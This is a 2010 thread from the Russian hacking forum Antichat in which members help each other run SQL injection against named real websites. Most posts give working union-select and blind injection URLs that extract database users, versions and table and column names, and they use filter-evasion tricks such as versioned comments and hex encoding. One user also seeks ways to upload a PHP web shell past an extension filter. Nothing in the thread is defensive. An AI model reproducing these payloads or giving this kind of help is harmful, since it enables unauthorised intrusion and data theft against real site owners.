Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
02.06.2010, 14:14
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441
Репутация:
0
|
|
Сообщение от Jokester
всё он верно сделал. Просто там несколько запросов
http://www.hoanganjsc.com.vn/product.php?prodid=-90/**/union/**/select/**/1,2,UNHEX(HEX(concat_ws(0x3a,User(),Database(),Ver sion()))),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
воу, большое!
поблагодарить Jokester
|
|
|
02.06.2010, 16:15
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Вроде бы на прошлой странице уже решили эту проблему или на этом сайте нужно было вывести данные именно в переменной тс?))
Сообщение от zq0d1v
Ошибка реагирует на union+select.
http://www.hoanganjsc.com.vn/product.php?catid=-52+union/**/select+1,2,3,4,5,6,7,8,9,10,version()--+
Jokester, зачем эти хексы, анхексы. Всё и так прекрасно выводится. Не в обиду 
http://www.hoanganjsc.com.vn/product.php?prodid=-90+union/**/select+1,2,concat_ws(0x3a,user(),database(),versio n()),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33--
Последний раз редактировалось v1d0qz; 02.06.2010 в 16:20..
|
|
|
|
02.06.2010, 16:41
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
http://www.mibf.ru/index.php?id=23+union+select+0,1,2,3,4,5,6,7,8,9
pomoqite raskrutit skul
|
|
|
|
02.06.2010, 17:03
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от LokbatanLi
http://www.mibf.ru/index.php?id=23+union+select+0,1,2,3,4,5,6,7,8,9
pomoqite raskrutit skul
пока получилась только слепая инъекция:
http://www.mibf.ru/index.php?id=23+and+substring(version(),1,1)=5--+
|
|
|
|
02.06.2010, 17:28
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
LokbatanLi
Если девятое поле не числовое отрабатывает редирект, а потом в урле вывод
http://www.mibf.ru/index.php?id=-23+union+select+1,2,3,4,5,6,7,version(),null,10/*
v1d0qz
Специально поставил хекс\анхекс ибо на въетнамском сайте у него дальше 99% начнутся проблемы с кодировкой, он опять придёт сюда с вопросом, и опять подарит мне "воу, большое!". А зачем мне два больших "воу", сам подумай? Я с одним-то не знаю что теперь делать 
|
|
|
|
02.06.2010, 20:12
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
http://www.armeniafund.org/press_releases/press_releases.php?id=-234+union+select+0,1,2,3,4,5,6
version()-4.0.27
mysql.user-net access
vot tolko nasel table_name-login nu ne moqu ne kak nayti column_name//
esli mojno pomoqite pojalusta//
i pomoymu bil sposob mojno nayti v 4 vetke column_name esli znaem table_name//
nu ne znayuk kak eto bil i qde 4ital..
pomoqite..
|
|
|
|
02.06.2010, 20:16
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
всё он верно сделал. Просто там несколько запросов http://www.hoanganjsc.com.vn/product.php?prodid=-90/**/union/**/select/**/1,2,UNHEX(HEX(concat_ws(0x3a,User(),Database(),Ver sion()))),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
а как насчет вывод таблиц (information_schema.tables фильтруется) там тоже фильтруется....
можно и так
http://www.hoanganjsc.com.vn/product.php?prodid=-90+/*!union*/+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15 ,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
|
|
|
|
02.06.2010, 20:38
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Заливаю шелл shell.php, shell.php.doc, shell.php.txt
выводит такую ошибку
Wrong field content:
File - allowed file extensions are PDF, PPT, PPS, DOC, XLS, TXT, HTM, HTML, GIF, JPG, RAR, ZIP
Как еще можно попробывать залить шелл?
Заранее всем спасибо!
|
|
|
|
02.06.2010, 21:01
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от Iceangel_
попробуй shell.php.xls
Не проходит.
|
|
|
|
02.06.2010, 21:07
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от pinch
а как насчет вывод таблиц (information_schema.tables фильтруется) там тоже фильтруется....
можно и так
http://www.hoanganjsc.com.vn/product.php?prodid=-90+/*!union*/+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14,15 ,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
http://www.hoanganjsc.com.vn/product.php?prodid=-90+/*!union*/select+1,2,UNHEX(HEX(concat_ws(0x3a,table_schema,t able_name,column_name))),4,5,6,7,8,9,0,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33/**/from/**/information_schema.columns+limit+1,1--
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
